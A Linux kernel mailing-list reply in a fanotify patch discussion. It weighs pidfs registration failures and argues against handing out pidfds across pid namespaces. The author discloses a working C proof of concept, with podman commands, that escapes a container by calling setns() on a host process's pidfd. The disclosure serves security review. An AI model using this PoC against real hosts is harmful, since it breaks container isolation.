Re: [PATCH v4 2/2] fanotify: allow reporting pidfds for reaped tasks
From: AnonymeMeow
Date: Sat Jun 06 2026 - 19:46:14 EST
On 2026-06-05 09:54 +0200, Christian Brauner wrote:
> On Fri, Jun 05, 2026 at 04:29:47AM +0800, AnonymeMeow wrote:
> > On 2026-06-03 13:25 +0200, Christian Brauner wrote:
> > > On Wed, Jun 03, 2026 at 12:58:09PM +0200, Amir Goldstein wrote:
> > > > On Wed, Jun 3, 2026 at 12:28 PM Christian Brauner <brauner@xxxxxxxxxx> wrote:
> > > > >
> > > > > On Wed, Jun 03, 2026 at 12:00:42PM +0200, Amir Goldstein wrote:
> > > > > > On Wed, Jun 3, 2026 at 5:11 AM AnonymeMeow <anonymemeow@xxxxxxxxx> wrote:
> > > > > > >
> > > > > > > Sashiko said that pidfs_register_pid() can fail under memory pressure,
> > > > > > > since it allocates memory using GFP_KERNEL without a way to pass in
> > > > > > > __GFP_NOFAIL. This can cause fanotify_alloc_event() to silently drop
> > > > > > > the event even when the group has an unlimited queue length.
> > > > > > >
> > > > > > > Should we make pidfs registration best-effort instead and still return
> > > > > > > the allocated event if pidfs_register_pid() fails? But IMO this will
> > > > > > > make the API semantically ambiguous. If the kernel guarantees that the
> > > > > > > event pid is registered with pidfs when pidfd reporting is requested,
> > > > > > > then a later FAN_NOPIDFD or -ESRCH can only be caused by the task being
> > > > > > > invisible within the reader's pid namespace. But if we allow best-effort
> > > > > > > registration, the event may still carry a pinned struct pid, but pidfs
> > > > > > > registration may have failed due to memory pressure. If userspace reads
> > > > > > > the event after the task has been reaped, it still gets a FAN_NOPIDFD
> > > > > > > or -ESRCH due to failed pidfs registration caused by memory pressure,
> > > > > > > IMO this should be reported as a -ENOMEM instead of -ESRCH. But
> > > > > > > currently it seems we don't have a good way to register the pid with
> > > > > > > __GFP_NOFAIL or __GFP_RETRY_MAYFAIL, so what would be the preferred
> > > > > > > approach to handle this situation?
> > > > > >
> > > > > > Thanks for noticing the oddity and explaining the options.
> > > > > >
> > > > > > We could fail the event in case on ENOMEM because the system
> > > > > > is likely is a bad shape anyway and other events are likely to fail
> > > > > > allocation themselves, so I am not objecting to your patch as is,
> > > > > >
> > > > > > but I am slightly leaning towards the semantically ambiguous API.
> > > > >
> > > > > As usual, I think a semantically ambiguous api should be avoided.
> > > > >
> > > > > > I don't think that we are going to change the man page to say that
> > > > > > FAN_REPORT_PIDFD is guaranteed to return a pidfd, maybe we just
> > > > > > add a NOTE about increased likelihood of getting a pidfd since kernel XXX
> > > > > > and mention the known cases of pid namespace and ENOMEM.
> > > > >
> > > > > The pid namespace shouldn't matter.
> > > >
> > > > DO you mean that the event reader inside a pidns always gets a pidfd but
> > > > it will not be able to query the pid of the process outside the pidns
> > > > or do you mean something else?
> > >
> > > So they will always get a pidfd since fanotify is correctly using
> > > pidfd_prepare() directly. But when the reader tries to resolve the pidfd
> > > to say a pid or retrieve info via the pidfd info ioctl they would fail
> > > to do so (well, the pid will resolve to 0 which is the global indicator
> > > for "can't be resolved in your pidns").
> > >
> >
> > Before pidfd_prepare(), fanotify checks whether metadata.pid is
> > non-zero, i.e. whether the event pid is visible in the reader's pidns.
> > If it's not visible, fanotify will not create a valid pidfd and return a
> > FAN_NOPIDFD. This is the existing behavior, and my patches do not change
> > it.
>
> We can hand that out. That's another change we should consider. The
> pidfd works even if the pid namespace is outside the caller's hierarchy.
>
I may be missing something, but I am concerned that lifting this
restriction could have security implications... Because it could weaken
the isolation provided by pidns. In the usual case, a task inside a
pidns cannot actively obtain a reference to tasks outside of that ns. If
fanotify is allowed to hand out pidfds across pidns boundaries, a task
inside the ns may be able to obtain access to resources that were
supposed to be isolated from it, such as other tasks' namespaces.
One possible attack surface I can think of is container escape. I wrote
a small toy PoC which escapes from a podman container using this
mechanism. Admittedly, the PoC requires sudo as well as SYS_ADMIN and
SYS_PTRACE caps, so it is not practical by itself. However, I am worried
that in other circumstances this could become a real attack surface.
I'm no expert in this area, so I do not think I am in a good position to
make that call myself... For now, I'm not planning to include removal of
this restriction in my patch set.
With Best Regards,
Anonymemeow
---
PoC code:
// toy.c
#define _GNU_SOURCE
#include <sys/fanotify.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/pidfd.h>
#include <sched.h>
int main()
{
int fanotify_fd = fanotify_init(FAN_REPORT_PIDFD, 0);
if (fanotify_fd < 0) {
perror("fanotify_init");
exit(1);
}
int ret = fanotify_mark(fanotify_fd, FAN_MARK_ADD | FAN_MARK_FILESYSTEM, FAN_ACCESS, 0, "/etc/resolv.conf");
if (ret < 0) {
perror("fanotify_mark");
exit(1);
}
for (;;) {
char buffer[65536];
int len = read(fanotify_fd, buffer, sizeof(buffer));
if (len < 0) {
perror("read");
break;
}
struct fanotify_event_metadata *metadata = (struct fanotify_event_metadata*)buffer;
while (FAN_EVENT_OK(metadata, len)) {
unsigned int offset = metadata->metadata_len;
while (offset < metadata->event_len) {
struct fanotify_event_info_header *info_hdr = (struct fanotify_event_info_header*)((char*)metadata + offset);
if (info_hdr->info_type == FAN_EVENT_INFO_TYPE_PIDFD) {
struct fanotify_event_info_pidfd *pidfd_info = (struct fanotify_event_info_pidfd*)info_hdr;
if (setns(pidfd_info->pidfd,
CLONE_NEWNS |
CLONE_NEWCGROUP |
CLONE_NEWUTS |
CLONE_NEWIPC |
CLONE_NEWNET
)) {
perror("setns");
exit(1);
}
int mntinfo_fd = open("/proc/self/mountinfo", O_RDONLY);
len = read(mntinfo_fd, buffer, sizeof(buffer));
if (len < 0) {
perror("read");
exit(1);
}
printf("%s\n", buffer);
exit(0);
}
offset += info_hdr->len;
}
close(metadata->fd);
metadata = FAN_EVENT_NEXT(metadata, len);
}
}
close(fanotify_fd);
return 0;
}
# gcc toy.c -o toy
# sudo podman run --rm --cap-add SYS_ADMIN,SYS_PTRACE -v ./toy:/root/toy debian:latest /root/toy
This PoC marks the fs backing the bind-mounted /etc/resolv.conf, which
in this setup is the host /run mount. This means when a process in the
host mntns accesses a file under /run, the program gets a chance to
receive its pidfd and call setns() on it, accomplishing the container
escape.